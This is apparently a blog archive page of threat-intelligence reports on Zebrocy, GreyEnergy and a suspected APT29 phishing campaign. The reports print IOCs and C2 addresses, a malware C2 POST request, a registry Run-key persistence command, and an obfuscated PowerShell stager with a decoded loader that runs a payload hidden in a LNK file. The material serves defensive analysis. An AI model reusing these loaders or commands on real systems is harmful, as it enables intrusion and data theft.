Category Archives: spear-phishing

GreyEnergy’s overlap with Zebrocy

In October 2018, ESET published a report describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.

Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and a Sofacy subset called “Zebrocy”. The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy’s targets are widely spread across the Middle East, Europe and Asia and the targets’ profiles are mostly government-related.

Both sets of activity used the same servers at the same time and targeted the same organization.

Details

Servers

In our private APT Intel report from July 2018 “Zebrocy implements new VBA anti-sandboxing tricks”, details were provided about different Zebrocy C2 servers, including 193.23.181[.]151.

In the course of our research, the following Zebrocy samples were found to use the same server to download additional components (MD5):

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
eae0b8997c82ebd93e999d4ce14dedf5
a5cbf5a131e84cd2c0a11fca5ddaa50a
c9e1b0628ac62e5cb01bf1fa30ac8317

The URL used to download additional data looks as follows:

hxxp://193.23.181[.]151/help-desk/remote-assistant-service/PostId.php?q={hex}

This same C2 server was also used in a spearphishing email attachment sent by GreyEnergy (aka FELIXROOT), as mentioned in a FireEye report. Details on this attachment are as follows:

  • The file (11227eca89cc053fb189fac3ebf27497) with the name “Seminar.rtf” exploited CVE-2017-0199
  • “Seminar.rtf” downloaded a second stage document from: hxxp://193.23.181[.]151/Seminar.rtf (4de5adb865b5198b4f2593ad436fceff, exploiting CVE-2017-11882)
  • The original document (Seminar.rtf) was hosted on the same server and downloaded by victims from: hxxp://193.23.181[.]151/ministerstvo-energetiki/seminars/2019/06/Seminar.rtf

Another server we detected that was used both by Zebrocy and by GreyEnergy is 185.217.0[.]124. Similarly, we detected a spearphishing GreyEnergy document (a541295eca38eaa4fde122468d633083, exploiting CVE-2017-11882), also named “Seminar.rtf”.

“Seminar.rtf”, a GreyEnergy decoy document

This document downloads a GreyEnergy sample (78734cd268e5c9ab4184e1bbe21a6eb9) from the following SMB link:

\\185.217.0[.]124\Doc\Seminar\Seminar_2018_1.AO-A

The following Zebrocy samples use this server as C2:

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
3803af6700ff4f712cd698cee262d4ac
e3100228f90692a19f88d9acb620960d

They retrieve additional data from the following URL:

hxxp://185.217.0[.]124/help-desk/remote-assistant-service/PostId.php?q={hex}

It is worth noting that at least two samples from the above list use both 193.23.181[.]151 and 185.217.0[.]124 as C2s.

Hosts associated with GreyEnergy and Zebrocy

Attacked company

Additionally, both GreyEnergy and Zebrocy spearphishing documents targeted a number of industrial companies in Kazakhstan. One of them was attacked in June 2018.

GreyEnergy and Zebrocy overlap

Attack timeframe

A spearphishing document entitled ‘Seminar.rtf’, which retrieved a GreyEnergy sample, was sent to the company approximately on June 21, 2018, followed by a Zebrocy spearphishing document sent approximately on June 28:

‘(28.06.18) Izmeneniya v prikaz PK.doc’ Zebrocy decoy document translation:
‘Changes to order, Republic of Kazakhstan’

The two C2 servers discussed above were actively used by Zebrocy and GreyEnergy almost at the same time:

  • 193.23.181[.]151 was used by GreyEnergy and Zebrocy in June 2018
  • 185.217.0[.]124 was used by GreyEnergy between May and June 2018 and by Zebrocy in June 2018

Conclusions

The GreyEnergy/BlackEnergy actor is an advanced group that possesses extensive knowledge on penetrating into their victim´s networks and exploiting any vulnerabilities it finds. This actor has demonstrated its ability to update its tools and infrastructure in order to avoid detection, tracking, and attribution.

Though no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis. In this paper, we detailed how both groups shared the same C2 server infrastructure during a certain period of time and how they both targeted the same organization almost at the same time, which seems to confirm the relationship’s existence.

For more information about APT reports please contact: intelreports@kaspersky.com

For more information about ICS threats please contact: ics-cert@kaspersky.com

Securelist: GreyEnergy’s overlap with Zebrocy

In October 2018, ESET published a report describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.

Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and a Sofacy subset called “Zebrocy”. The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy’s targets are widely spread across the Middle East, Europe and Asia and the targets’ profiles are mostly government-related.

Both sets of activity used the same servers at the same time and targeted the same organization.

Details

Servers

In our private APT Intel report from July 2018 “Zebrocy implements new VBA anti-sandboxing tricks”, details were provided about different Zebrocy C2 servers, including 193.23.181[.]151.

In the course of our research, the following Zebrocy samples were found to use the same server to download additional components (MD5):

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
eae0b8997c82ebd93e999d4ce14dedf5
a5cbf5a131e84cd2c0a11fca5ddaa50a
c9e1b0628ac62e5cb01bf1fa30ac8317

The URL used to download additional data looks as follows:

hxxp://193.23.181[.]151/help-desk/remote-assistant-service/PostId.php?q={hex}

This same C2 server was also used in a spearphishing email attachment sent by GreyEnergy (aka FELIXROOT), as mentioned in a FireEye report. Details on this attachment are as follows:

  • The file (11227eca89cc053fb189fac3ebf27497) with the name “Seminar.rtf” exploited CVE-2017-0199
  • “Seminar.rtf” downloaded a second stage document from: hxxp://193.23.181[.]151/Seminar.rtf (4de5adb865b5198b4f2593ad436fceff, exploiting CVE-2017-11882)
  • The original document (Seminar.rtf) was hosted on the same server and downloaded by victims from: hxxp://193.23.181[.]151/ministerstvo-energetiki/seminars/2019/06/Seminar.rtf

Another server we detected that was used both by Zebrocy and by GreyEnergy is 185.217.0[.]124. Similarly, we detected a spearphishing GreyEnergy document (a541295eca38eaa4fde122468d633083, exploiting CVE-2017-11882), also named “Seminar.rtf”.

“Seminar.rtf”, a GreyEnergy decoy document

This document downloads a GreyEnergy sample (78734cd268e5c9ab4184e1bbe21a6eb9) from the following SMB link:

\\185.217.0[.]124\Doc\Seminar\Seminar_2018_1.AO-A

The following Zebrocy samples use this server as C2:

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
3803af6700ff4f712cd698cee262d4ac
e3100228f90692a19f88d9acb620960d

They retrieve additional data from the following URL:

hxxp://185.217.0[.]124/help-desk/remote-assistant-service/PostId.php?q={hex}

It is worth noting that at least two samples from the above list use both 193.23.181[.]151 and 185.217.0[.]124 as C2s.

Hosts associated with GreyEnergy and Zebrocy

Attacked company

Additionally, both GreyEnergy and Zebrocy spearphishing documents targeted a number of industrial companies in Kazakhstan. One of them was attacked in June 2018.

GreyEnergy and Zebrocy overlap

Attack timeframe

A spearphishing document entitled ‘Seminar.rtf’, which retrieved a GreyEnergy sample, was sent to the company approximately on June 21, 2018, followed by a Zebrocy spearphishing document sent approximately on June 28:

‘(28.06.18) Izmeneniya v prikaz PK.doc’ Zebrocy decoy document translation:
‘Changes to order, Republic of Kazakhstan’

The two C2 servers discussed above were actively used by Zebrocy and GreyEnergy almost at the same time:

  • 193.23.181[.]151 was used by GreyEnergy and Zebrocy in June 2018
  • 185.217.0[.]124 was used by GreyEnergy between May and June 2018 and by Zebrocy in June 2018

Conclusions

The GreyEnergy/BlackEnergy actor is an advanced group that possesses extensive knowledge on penetrating into their victim´s networks and exploiting any vulnerabilities it finds. This actor has demonstrated its ability to update its tools and infrastructure in order to avoid detection, tracking, and attribution.

Though no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis. In this paper, we detailed how both groups shared the same C2 server infrastructure during a certain period of time and how they both targeted the same organization almost at the same time, which seems to confirm the relationship’s existence.

For more information about APT reports please contact: intelreports@kaspersky.com

For more information about ICS threats please contact: ics-cert@kaspersky.com



Securelist

A Zebrocy Go Downloader

Last year at SAS2018 in Cancun, Mexico, “Masha and these Bears” included discussion of a subset of Sofacy activity and malware that we call “Zebrocy”, and predictions for the decline of SPLM/XAgent Sofacy activity coinciding with the acceleration of Zebrocy activity and innovation. Zebrocy was initially introduced as a Sofacy backdoor package in 2015, but the Zebrocy cluster has carved a new approach to malware development and delivery to the world of Sofacy. In line with this approach, we will present more on this Zebrocy innovation and activity playing out at SAS 2019 in Singapore.

Our colleagues at Palo Alto recently posted an analysis of Zebrocy malware. The analysis is good and marked their first detection of a Zebrocy Go variant as October 11, 2018. Because there is much to this cluster, clarifying and adding to the discussion is always productive.

Our original “Zebrocy Innovates – Layered Spearphishing Attachments and Go Downloaders” June 2018 writeup documents the very same downloader, putting the initial deployment of Zebrocy Go downloader activity at May 10, 2018. And while the targeting in the May event was most likely different from the October event, we documented this same Go downloader and same C2 was used to target a Kyrgyzstan organization. Also interesting is that the exact same system was a previous Zebrocy target earlier in 2018. So, knowing that this same activity is being reported on as “new” six months later tells us a bit about the willingness of this group to re-use rare components and infrastructure across different targets.

While they are innovating with additional languages, as we predicted in early 2018, their infrastructure and individual components may have more longevity than predicted. Additionally, at the beginning of 2018, we predicted the volume of Zebrocy activity and innovation will continue to increase, while the more traditional SPLM/XAgent activity will continue to decline. Reporting on SPLM/XAgent certainly has followed this course in 2018 as SPLM/XAgent detections wind down globally, as has Sofacy’s use of this malware from our perspective.

Much of the content below is reprinted from our June document.

The Sofacy subset we identify as “Zebrocy” continues to target Central Asian government related organizations, both in-country and remote locations, along with a new middle eastern diplomatic target. And, as predicted, they continue to build out their malware set with a variety of scripts and managed code. In this case, we see new spearphishing components – an LNK file maintaining powershell scripts and a Go-implemented system information collector/downloader. This is the first time we have observed a well-known APT deploy malware with this compiled, open source language “Go”. There is much continued recent Zebrocy activity using their previously known malware set as well.

Starting in May 2018, Zebrocy spearphished Central Asian government related targets directly with this new Go downloader. For example, the attachment name included one “30-144.arj” compressed archive, an older archiver type handled by 7zip, Rar/WinRAR, and others. Users found “30-144.exe” inside the archive with an altered file icon made to look like the file was a Word document (regardless of the .exe file extension). And in a similar fashion in early June, Zebrocy spearphished over a half-dozen accounts targeting several Central Asian countries’ diplomatic organizations with a similar scheme “2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx”, sending out a more common Zebrocy Delphi downloader.

In other cases, delivery of the new Go downloader was not straightforward. The new Go downloader also was delivered with a new spearphishing object that rolls up multiple layers of LNK file, powershell scripts, base64 encoded content, .docx files and the Go downloader files. The downloader is an unusually large executable at over 1.5mb, written to disk and launched by a powershell script. So the attachment that arrived over email was large.
The powershell script reads the file’s contents from a very large LNK file that was included as an email attachment, and then writes it to disk along with a Word document of the same name. So, launching the downloader is followed with the opening of an identically named decoy word document with “WINWORD.EXE” /n “***\30-276(pril).docx” /o”. The downloader collects a large amount of system information and POSTs it to a known Zebrocy C2, then pulls down known Zebrocy Delphi payload code, launches it, and deletes itself.

We observed previous, somewhat similar spearphishing scenarios with an archive containing .LNK, .docx, and base64 encoded executable code, delivering offensive Finfisher objects in separate intrusion activity clusters. This activity was not Sofacy, but the spearphishing techniques were somewhat similar – the layered powershell script attachment technique is not the same, but not altogether new.

And, it is important to reiterate that these Central Asian government and diplomatic targets are often geolocated remotely. In the list of target geolocations, notice countries like South Korea, the Netherlands, etc. In addition to Zebrocy Go downloader data, this report provides data on various other observed Zebrocy malware and targets over the past three months.

Spreading

Mostly all observed Zebrocy activity involves spearphishing. Spearphish attachments arrive with .rar or .arj extensions. Filename themes include official government correspondence invitations, embassy notes, and other relevant items of interest to diplomatic and government staff. Enclosed objects may be LNK, docx, or exe files.

A decoy PDF that directly targeted a Central Asian nation is included in one of the .arj attachments alongside the Go downloader. The content is titled “Possible joint projects in cooperation with the International Academy of Sciences” and lists multiple potential projects requiring international cooperation with Tajikistan and other countries. This document appears to be a legitimate one that was stolen, created mid-May 2018. While we cannot reprint potentially leaked information publicly, clearly, the document was intended for a Russian-language reader.

Powershell launcher from within LNK

The LNK containing two layers of powershell script and base64 encoded content is an unusual implementation – contents from a couple are listed at the technical appendix. When opened, the script opens the shortcut file it is delivered within (“30-276(pril).docx.lnk”), pulls out the base64 encoded contents (in one case, from byte 3507 to byte 6708744), base64 decodes the content and another layer of the same powershell decoding. This script writes two files to disk as “30-276(pril).exe” and “30-276(pril).docx” and opens both files, leading to the launch of the Go language system information collector/downloader and a decoy Word document.

Go System Information Collector/Downloader

Md5              333d2b9e99b36fb42f9e79a2833fad9c
Sha256         fcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e
Size              1.79mb (upx packed – 3.5mb upx unpacked)
CompiledOn Stomped (Wed Dec 31 17:00:00 1969)
Type             PE 32-bit Go executable
Name           30-276(pril).exe

This new Go component not only downloads and executes another Zebrocy component, but it enumerates and collects a fair amount of system data for upload to its C2, prior to downloading and executing any further modules. It simply collects data using the systeminfo utility, and in turn makes a variety of WMI calls.

After collecting system information, the backdoor calls out to POST to its hardcoded C2, in this case a hardcoded IP/Url. Note that the backdoor simply uses the default Go user-agent:
“POST /technet-support/library/online-service-description.php?id_name=345XXXD5
HTTP/1.1
Host: 89.37.226.148
User-Agent: Go-http-client/1.1”

With this POST, the module uploads all of the system information it just gathered with the exhaustive systeminfo utility over http: hostname, date/time, all hardware, hotfix, service and software information.

The module then retrieves the gzip’d, better known Zebrocy dropper over port 80 as part of an encoded jpg file, writes it to disk, and executes from a command line:
“cmd /C c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe”
and adds a run key persistence entry with the system utility reg.exe:
cmd /C “reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d
c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe /f”

Zebrocy AutoIT Dropper

Md5              3c58ed6913593671666283cb7315dec3
Sha256         96c3700ad639faa85982047e05fbd71c3dfd502b09f9860685498124e7dbaa46
Size              478.5kb (upx-packed)
Compiled     Fri Apr 27 06:40:32 2018
Type             PE32 AutoIT executable
Path, Name  appdata\Identities\{83AF1378-986F-1673-091A-02681FA62C3B}\w32srv.exe

This AutoIT dropper writes out a Delphi payload, consistent with previous behavior going back to November 2015, initially described in our January 2016 report “Zebrocy – Sofacy APT Deploys New Delphi Payload”.

Zebrocy Delphi Payload

Md5               2f83acae57f040ac486eca5890649381
Sha256          f9e96b2a453ff8922b1e858ca2d74156cb7ba5e04b3e936b77254619e6afa4e8
Size               786kb
Compiled       Fri Jun 19 16:22:17 1992 (stomped/altered)
Type              PE32 exe [v4.7.7] Path, Name   c:\ProgramData\Protection\Active\armpro.exe

Interestingly the final payload reverts back to an earlier version [v4.7.7]. A “TURBO” command is missing from this Zebrocy Delphi backdoor command list .
SYS_INFO
SCAN_ALL
SCAN_LIST
DOWNLOAD_DAY
DOWNLOAD_LIST
CREATE_FOLDER
UPLOAD_FILE
FILE_EXECUTE
DELETE_FILES
REG_WRITE_VALUE
REG_READ_VALUE
REG_DELETE_VALUE
REG_GET_KEYS_VALUES
REG_DELETE_KEY
KILL_PROCESS
CONFIG
GET_NETWORK
CMD_EXECUTE
DOWNLOAD_DATE
DELETE_FOLDER
UPLOAD_AND_EXECUTE_FILE
SCREENSHOTS
FILE_EXECUTE
SET_HIDDEN_ATTR
START
STOP
KILL_MYSELF

Infrastructure

Zebrocy backdoors are configured to directly communicate with IP assigned web server hosts over port 80, and apparently the group favors Debian Linux for this part of infrastructure: Apache 2.4.10 running on Debian Linux. A somewhat sloppy approach continues, and the group set up and configured one of the sites with digital certificates using a typical Sofacy-sounding domain that they have not yet registered: “weekpost.org”. Digital certificate details are provided in the appendix.

These “fast setup” VPS servers run in “qhoster[.]com” can be paid for with Webmoney, Bitcoin, Litecoin, Dash, Alfa Click, Qiwi, transfers from Sberbank Rossii, Svyaznoy, Promsvyazbank, and more. Although, it appears that Bitcoin and Dash may be of the most interest to help ensure anonymous transactions. Dataclub provides similar payment methods:

One of the VPS IP addresses (80.255.12[.]252) is hosted in the “afterburst[.]com”/Oxygem range. This service is the odd one out and is unusual because it only supports VISA/major credit cards and Paypal at checkout. If other payment options are provided, they are not a part of the public interface.

Victims and Targeting

Zebrocy Go downloader 2018 targets continue to be Central Asian government foreign policy and administrative related. Some of these organizations are geolocated in-country, or locally, and some are located remotely. In several cases, these same systems have seen multiple artefacts from Zebrocy over the course of 2017 and early 2018:
• Kazakhstan
• Kyrgyzstan
• Azerbaijan
• Tajikistan

Additional recent Zebrocy target geo-locations (targeting various Central Asian/ex-USSR local and remote government locations):
• Qatar
• Ukraine
• Czech Republic
• Mongolia
• Jordan
• Germany
• Belgium
• Iran
• Turkey
• Armenia
• Afghanistan
• South Korea
• Turkmenistan
• Kazakhstan
• Netherlands
• Kuwait
• United Arab Emirates
• Spain
• Poland
• Qatar
• Oman
• Switzerland
• Mongolia
• Kyrgyzstan
• United Kingdom

Attribution

Zebrocy activity is a known subset of Sofacy activity. We predicted that they would continue to innovate within their malware development after observing past behavior, developing with Delphi, AutoIT, .Net C#, Powershell, and now “Go” languages. Their continued targeting, phishing techniques, infrastructure setup, technique and malware innovation, and previously known backdoors help provide strong confidence that this activity continues to be Zebrocy.

Conclusions

Zebrocy continues to maintain a higher level of volume attacking local and remote ex-USSR republic Central Asian targets than other clusters of targeted Sofacy activity. Also interesting with this Sofacy sub-group is the innovation that we continue to see within their malware development. Much of the spearphishing remains thematically the same, but the remote locations of these Central Asian targets are becoming more spread out – South Korea, Netherlands, etc. While their focus has been on Windows users, it seems that we can expect the group to continue making more innovations within their malware set. Perhaps all their components will soon support all OS platforms that their targets may be using, including Linux and MacOS. Zebrocy spearphishing continues to be characteristically higher volume for a targeted attacker, and most likely that trend will continue.
And, as their spearphishing techniques progress to rival Finfisher techniques without requiring zero-day exploitation, perhaps Zebrocy will expand their duplication of more sources of open source spearphishing techniques.

IoC

Go downloader
333d2b9e99b36fb42f9e79a2833fad9c

IPs
80.255.12.252
89.37.226.148
46.183.218.34
185.77.131.110
92.114.92.128

URLs
/technet-support/library/online-service-description.php?id_name=XXXXX
/software-apptication/help-support-apl/getidpolapl.php

File – paths and names
30-276(pril).exe
30-144-(copy).exe
Embassy Note No.259.docx.lnk
2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx

First Annual Cyberwarcon

Cyberwarcon is a brand new event organized yesterday in Arlington, Virginia, and delivered eight hours of fantastic content. “CyberwarCon is a one-day conference in the Washington D.C. area focused on the specter of destruction, disruption, and malicious influence on our society through cyber capabilities. We are increasingly concerned that aggressive behavior in this space is not abating and public discourse is necessary to shore up our defenses and prepare for inevitable incidents”. The list of speakers was diverse in their interests, from big data visualization technologies and analysis of social media misinformation campaigns, to incidents of Russian speaking APT in the US electrical grid. Thomas Rid keynoted with a presentation full of newly unearthed images and details on the earliest known misinformation campaign targeting the US, with some hints of what is to come for his upcoming book “Active Measures: A History of Disinformation”, certain to be another fascinating study and read. The full agenda can be found here.

Cyberwarcon badge

Our participation included my lightning talk presentation “Barely Whispering – Recent RU-speaking APT findings”. I attempted to clarify several transitively related clusters of RU-speaking APT activity and resources that we label Sofacy, BE/GreyEnergy, Zebrocy, and an advanced cluster, Hades, and introduced some data points new to public discussion about the groups. Three have exhibited disruptive and destructive behavior. It’s nice to see that some of the information I mentioned yesterday, Zebrocy’s nine month long and increasingly large wave of spearphishing, is in the news today. I briefly mentioned that their remote template spearphishing techniques, along with a switch back to the Delphi backdoor from a C# “Cannon” backdoor, was spreading to western networks. Timely stuff.

Check out the images and tweets at #CYBERWARCON. Hope to see you next year!

Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign

Introduction

  • FireEye devices detected intrusion attempts against multiple industries, including think tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government, and defense contracting.
  • The attempts involved a phishing email appearing to be from the U.S. Department of State with links to zip files containing malicious Windows shortcuts that delivered Cobalt Strike Beacon.
  • Shared technical artifacts; tactics, techniques, and procedures (TTPs); and targeting connect this activity to previously observed activity suspected to be APT29.
  • APT29 is known to transition away from phishing implants within hours of initial compromise.

On November 14, 2018, FireEye detected new targeted phishing activity at more than 20 of our clients across multiple industries.

The attacker appears to have compromised the email server of a hospital and the corporate website of a consulting company in order to use their infrastructure to send phishing emails. The phishing emails were made to look like secure communication from a Public Affairs official at the U.S. Department of State, hosted on a page made to look like another Department of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. This information could be obtained via publicly available data, and there is no indication that the Department of State network was involved in this campaign. The attacker used unique links in each phishing email and the links that FireEye observed were used to download a ZIP archive that contained a weaponized Windows shortcut file, launching both a benign decoy document and a Cobalt Strike Beacon backdoor, customized by the attacker to blend in with legitimate network traffic.

Several elements from this campaign – including the resources invested in the phishing email and network infrastructure, the metadata from the weaponized shortcut file payload, and the specific victim individuals and organizations targeted – are directly linked to the last observed APT29 phishing campaign from November 2016. This blog post explores those technical breadcrumbs and the possible intentions of this activity.

Attribution Challenges

Conclusive FireEye attribution is often obtained through our Mandiant consulting team's investigation of incidents at compromised organizations, to identify details of the attack and post-compromise activity at victims. FireEye is still analyzing this activity.

There are several similarities and technical overlaps between the 14 November 2018, phishing campaign and the suspected APT29 phishing campaign on 9 November 2016, both of which occurred shortly after U.S. elections. However, the new campaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and procedures (TTPs), including using the same system to weaponize a Windows shortcut (LNK) file. APT29 is a sophisticated actor, and while sophisticated actors are not infallible, seemingly blatant mistakes are cause for pause when considering historical uses of deception by Russian intelligence services. It has also been over a year since we have conclusively identified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long interlude.

Notable similarities between this and the 2016 campaign include the Windows shortcut metadata, targeted organizations and specific individuals, phishing email construction, and the use of compromised infrastructure. Notable differences include the use of Cobalt Strike, rather than custom malware; however, many espionage actors do use publicly and commercially available frameworks for reasons such as plausible deniability.

During the phishing campaign, there were indications that the site hosting the malware was selectively serving payloads. For example, requests using incorrect HTTP headers reportedly served ZIP archives containing only the benign publicly available Department of State form. It is possible that the threat actor served additional and different payloads depending on the link visited; however, FireEye has only observed two: the benign and Cobalt Strike variations.

We provide details of this in the activity summary. Analysis of the campaign is ongoing, and we welcome any additional information from the community.

Activity Summary

The threat actor crafted the phishing emails to masquerade as a U.S. Department of State Public Affairs official sharing an official document. The links led to a ZIP archive that contained a weaponized Windows shortcut file hosted on a likely compromised legitimate domain, jmj[.].com. The shortcut file was crafted to execute a PowerShell command that read, decoded, and executed additional code from within the shortcut file.

Upon execution, the shortcut file dropped a benign, publicly available, U.S. Department of State form and Cobalt Strike Beacon. Cobalt Strike is a commercially available post-exploitation framework. The BEACON payload was configured with a modified variation of the publicly available "Pandora" Malleable C2 Profile and used a command and control (C2) domain – pandorasong[.]com – assessed to be a masquerade of the Pandora music streaming service. The customization of the C2 profile may have been intended to defeat less resilient network detection methods dependent on the default configurations. The shortcut metadata indicates it was built on the same or very similar system as the shortcut used in the November 2016 campaign. The decoy content is shown in Figure 1.


Figure 1: Decoy document content

Similarities to Older Activity

This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The malicious LNK used in the recent spearphishing campaign, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), has technical overlaps with a suspected APT29 LNK from November 2016, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d), which was publicly reported by Volexity. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created.

Additional overlap was observed in the targeting and tactics employed in the phishing campaigns responsible for distributing these LNK file. Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has leveraged large waves of emails in previous campaigns.

Outlook and Implications

Analysis of this activity is ongoing, but if the APT29 attribution is strengthened, it would be the first activity uncovered from this sophisticated group in at least a year. Given the widespread nature of the targeting, organizations that have previously been targeted by APT29 should take note of this activity. For network defenders, whether or not this activity was conducted by APT29 should be secondary to properly investigating the full scope of the intrusion, which is of critical importance if the elusive and deceptive APT29 operators indeed had access to your environment.  

Technical Details

Phishing

Emails were sent from DOSOneDriveNotifications-svCT-Mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[.]org with the subject Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you. The distribution of emails varied significantly between the affected organizations. While most targeted FireEye customers received three or fewer emails, some received significantly more, with one customer receiving 136.

Each phishing email contained a unique malicious URL, likely for tracking victim clicks. The pattern of this URL is shown in Figure 2.


Figure 2: Malicious URL structure

Outside of the length of the sender email address, which may have been truncated on some recipient email clients, the attacker made little effort to hide the true source of the emails, including that they were not actually sent from the Department of State. Figure 3 provides a redacted snapshot of email headers from the phishing message.


Figure 3: Redacted email headers

The malicious links are known to have served two variants of the file ds7002.zip. The first variant (MD5: 3fccf531ff0ae6fedd7c586774b17a2d), contained ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c). ds7002.lnk was a malicious shortcut (LNK) file that contained an embedded BEACON DLL and decoy PDF, and was crafted to launch a PowerShell command. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON backdoor and decoy PDF. The other observed variant of ds7002.zip (MD5: 658c6fe38f95995fa8dc8f6cfe41df7b) contained only the benign decoy document. The decoy document ds7002.pdf (MD5: 313f4808aa2a2073005d219bc68971cd) appears to have been downloaded from hxxps://eforms.state.gov/Forms/ds7002.PDF.

The BEACON backdoor communicated with the C2 domain pandorasong[.]com (95.216.59[.]92). The domain leveraged privacy protection, but had a start of authority (SOA) record containing vleger@tutanota.com.

Our analysis indicates that the attacker started configuring infrastructure approximately 30 days prior to the attack. This is a significantly longer delay than many other attackers we track. Table 1 contains a timeline of this activity.

Time

Event

Source

2018-10-15 15:35:19Z

pandorasong[.]com registered

Registrant Information

2018-10-15 17:39:00Z

pandorasong[.]com SSL certificate established

Certificate Transparency

2018-10-15 18:52:06Z

Cobalt Strike server established

Scan Data

2018-11-02 10:25:58Z

LNK Weaponized

LNK Metadata

2018-11-13 17:58:41Z

3fccf531ff0ae6fedd7c586774b17a2d modified

Archive Metadata

2018-11-14 01:48:34Z

658c6fe38f95995fa8dc8f6cfe41df7b modified

Archive Metadata

2018-11-14 08:23:10Z

First observed phishing e-mail sent

Telemetry

Table 1: Operational timeline

Execution

Upon execution of the malicious LNK, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), the following PowerShell command was executed:

\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noni -ep bypass
$zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5
rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJE
Vudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W
0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUp
O30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ
1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2en
ZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZC
gkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFy
cmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJL
kdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.E
ncoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;

This command included some specific obfuscation, which may indicate attempts to bypass specific detection logic. For example, the use of 'FromBase'+0x40+'String', in place of FromBase64String, the PowerShell command used to decode base64.

The decoded command consisted of additional PowerShell that read the content of ds7002.lnk from offset 0x5e2be to offset 0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content. The embedded PowerShell code decoded to the following:

$ptgt=0x0005e2be;
$vcq=0x000623b6;
$tb="ds7002.lnk";
if (-not(Test-Path $tb))
{
$oe=Get-ChildItem -Path $Env:temp -Filter $tb -Recurse;
if (-not $oe)
{
   exit
}
[IO.Directory]::SetCurrentDirectory($oe.DirectoryName);
}
$vzvi=New-Object IO.FileStream $tb,'Open','Read','ReadWrite';
$oe=New-Object byte[]($vcq-$ptgt);
$r=$vzvi.Seek($ptgt,[IO.SeekOrigin]::Begin);
$r=$vzvi.Read($oe,0,$vcq-$ptgt);
$oe=[Convert]::FromBase64CharArray($oe,0,$oe.Length);
$zk=[Text.Encoding]::ASCII.GetString($oe);
iex $zk;

When the decoded PowerShell is compared to the older 2016 PowerShell embedded loader (Figure 4), it's clear that similarities still exist. However, the new activity leverages randomized variable and function names, as well as obfuscating strings contained in the script.


Figure 4: Shared functions to loader in older activity (XOR decode function and CopyFilePart)

The PowerShell loader code is obfuscated, but a short de-obfuscated snippet is shown as follows. The decoy PDF and BEACON loader DLL are read from specific offsets within the LNK, decoded, and their contents executed. The BEACON loader DLL is executed with the export function "PointFunctionCall":

[TRUNCATED]
$jzffhy = [IO.FileAccess]::READ
$gibisec = myayxvj $("ds7002.lnk")
